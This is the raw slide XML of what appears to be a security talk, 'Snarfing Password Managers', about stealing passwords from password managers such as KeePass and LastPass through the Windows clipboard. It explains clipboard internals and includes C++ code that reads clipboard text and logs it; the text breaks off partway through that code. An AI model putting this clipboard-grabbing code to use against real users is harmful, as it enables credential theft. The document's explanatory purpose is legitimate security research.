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257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="27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656" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2381"/>
        <p:guide pos="317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3A11A791-D7A2-4189-BBD9-B4DC461C143B}" type="slidenum">
              <a:rPr/>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr sz="1400"/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
              <a:ln>
                <a:noFill/>
              </a:ln>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Lucida Sans Unicode" pitchFamily="2"/>
                <a:cs typeface="Tahoma" pitchFamily="2"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{F754A013-AE4E-401C-9DB5-A9AA825FEF25}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8404593-80E0-4029-BE4B-22D28E5DF5C6}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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906D1FD-CC53-4E97-97F8-5A414A2AE781}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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25"/>
            <a:ext cx="22669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3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2B6A10C-AC87-42C3-ABB1-E40B2B74DBA6}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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19138A9-D8D9-47A2-BB45-EB5CDFDDA3BA}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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6F41E8B-42A7-49D6-B34B-B261ED0B781D}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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656D29-76F7-4F5E-85BB-82CA99766C4B}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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A5D436A-26C2-4B95-BF44-2EE29BBB0BFE}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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68BACB6A-3F55-480F-BEE1-AE7C6AB1E4C8}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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CA081642-E23C-498C-908E-35A92E8F1919}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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5922317-397E-4DE4-A33E-3E0C9D50BA80}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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1CAD989-2EA4-4C4B-91F0-258F60BD458C}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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DCCDDCF-BC3A-4BD0-969E-03862E8E6242}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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FBD6FB2-30C2-441D-BA95-0D881C3F526A}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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C47EA81-03E9-4CC7-8000-2F4FFB3F0D63}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="0"/>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25"/>
            <a:ext cx="22669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3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B33FB30-ED51-48AC-963C-648E39B317D4}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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A3148CB-002A-4259-8885-7DEF056EF9AF}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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F89E968-6D43-4FF7-8C71-3BBD54C0522C}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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BDAF2383-0546-4410-B666-906846099033}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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5D0371B-31D8-4809-99C1-0502EB5F364D}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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491C6735-7B41-4F51-B297-C9E921E73C2F}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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A3AB9422-A236-4C7F-AFF4-9B0BE7533E7C}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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304224A-540F-47F0-8E9B-09B377C990E1}" type="slidenum">
              <a:rPr/>
              <a:pPr lvl="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Pictures/100000000000032000000258386DF587.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503999" y="1769040"/>
            <a:ext cx="9071640" cy="43844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en-US" sz="24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24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Lucida Sans Unicode" pitchFamily="2"/>
                <a:cs typeface="Tahoma" pitchFamily="2"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{C07D74EF-E59D-44B7-8227-5C7FD524AD57}"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hangingPunct="0">
        <a:tabLst/>
        <a:defRPr lang="en-US"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en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:latin typeface="Arial"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503999" y="1769040"/>
            <a:ext cx="9071640" cy="4384440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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503999" y="6887160"/>
            <a:ext cx="2348280" cy="521280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" rtl="0" hangingPunct="0">
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>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447360" y="6887160"/>
            <a:ext cx="3195000" cy="521280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0" hangingPunct="0">
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>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7227360" y="6887160"/>
            <a:ext cx="2348280" cy="521280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0" hangingPunct="0">
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18"/>
                <a:ea typeface="Lucida Sans Unicode" pitchFamily="2"/>
                <a:cs typeface="Tahoma" pitchFamily="2"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{1D7139C8-09BF-4CFF-8B05-39405FF5B944}"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hangingPunct="0">
        <a:tabLst/>
        <a:defRPr lang="en-US" sz="3660" b="0" i="0" u="none" strike="noStrike">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Albany" pitchFamily="18"/>
          <a:cs typeface="Tahoma" pitchFamily="2"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="0" rtl="0" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="1414"/>
        </a:spcAft>
        <a:tabLst/>
        <a:defRPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:latin typeface="Albany" pitchFamily="18"/>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ideo" Target="in%20action.avi"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ideo" Target="20121017_1258_32.avi"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4680"/>
            <a:ext cx="9071640" cy="5201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Snarfing Password Managers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068240" y="5030280"/>
            <a:ext cx="3006000" cy="2497320"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573120" y="1016280"/>
            <a:ext cx="5479559" cy="861774"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>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marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Specific targeting of password management utilities such as:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1982880"/>
            <a:ext cx="9070920" cy="300564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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Keepass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>PWGorilla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>RoboForm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>PwDepot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> / Anything I missed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="5030280"/>
            <a:ext cx="3432960" cy="2510280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3377160" y="566280"/>
            <a:ext cx="3657600" cy="4806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1800"/>
              <a:t>By Joseph Giron aka AverageJoe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="43560" y="5043960"/>
            <a:ext cx="3532320" cy="2532600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360120" y="1268640"/>
            <a:ext cx="3698639" cy="362268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About The Clipboard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1769040"/>
            <a:ext cx="9071640" cy="5790635"/>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1800" dirty="0"/>
              <a:t>You know what the clipboard does(hopefully), but not what it is. The clipboard is a set of functions and messages that enable applications to transfer data. All applications have access to the clipboard, so data can be  transferred between applications or within an application (or in our case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>snarfed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) . Its essentially a blindly trusted input / output area in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Most objects can be copied into this  buffer as a ghetto form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>interprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> communication however special data needs special formatting, thus you can register special clipboard formats. This is done with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>RegisterClipboardFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> win32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. This allows for a broader range of objects to be copied from a sound selection in Audacity to a row of cells in Excel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The data itself lives in a linked list named '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gpnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>' managed by win32k.sys. Internally, the functions Get/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SetClipboardData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>() which are exported by user32.dll allow access to that memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>There can be multiple clipboards for different Desktop sessions. Window's implementation of Terminal Services allows for separation of clipboard data between Station Objects which can be accessed via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>OpenWindowStation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> function.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554911" y="-13680"/>
            <a:ext cx="1654967" cy="1770120"/>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793801" y="-3960"/>
            <a:ext cx="1808112" cy="177012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158400"/>
            <a:ext cx="9071640" cy="5201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Snarfing The Clipboard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-99360" y="744120"/>
            <a:ext cx="9675000" cy="8201519"/>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1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GrabClipStuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(){	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>/* Allocate enough memory to save text in clipboard */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>WCHAR * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> = new WCHAR[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>() + 1 ] ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> ) ; // Get the clipboard text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>writelogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>); // write the log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>delete[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>szClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> ; // free the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="FreeMono" pitchFamily="49"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>SIZE_T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>OpenClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(NULL) ;                          // Obtain clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>HGLOBAL handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> (CF_TEXT) ;  // get handle to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>CloseClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>() ;                             // Close clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GlobalSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>( handle ) ;                  // return size of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(TCHAR * buffer ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>OpenClipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>(NULL) ;                          // Obtain clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>HGLOBAL handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>GetClipboardData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t> (CF_TEXT) ;  // get handle to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
